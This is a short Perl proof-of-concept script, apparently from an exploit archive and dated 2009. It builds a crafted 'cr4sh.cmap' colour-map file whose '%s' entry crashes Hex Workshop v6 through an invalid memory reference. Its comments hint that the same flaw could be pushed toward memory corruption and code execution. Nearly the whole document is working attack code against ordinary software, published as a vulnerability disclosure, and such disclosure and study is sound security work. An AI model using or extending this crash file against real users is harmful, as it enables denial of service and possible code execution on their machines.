
# Title : Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC
# Published : 2009-02-03
# Author : DATA_SNIPER


#!/usr/bin/perl -w
# Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference Crash POC
# Discovered by : DATA_SNIPER
# For more information visit my blog: http://datasniper.arab4services.net/
# The exploit is very hard to implement; if we can make the "reference" point to a valid memory location containing
# a unicode string, we can corrupt the memory and get code execution (it's not so easy, as you can see; try it manually in Olly).
print "==========================================================================\n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n";
print "Discovered by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "===================================================================== \n";
# Two-line .cmap body: a comment line, then one colour entry whose name is the literal string "%s".
my $crash = '#Simple POC by DATA_SNIPER'."\n".'"%s"= RGB(0, 0, 0)'; # don't worry about it, it's not a format string bug :)
my $file = "cr4sh.cmap";
# Three-argument open in append mode, as in the original script.
open(my $data, '>>', $file) or die "Cannot open $file: $!";
print $data $crash;
close($data);
print "$file has been created\n";
print "open it in HexWorkshop.\n";
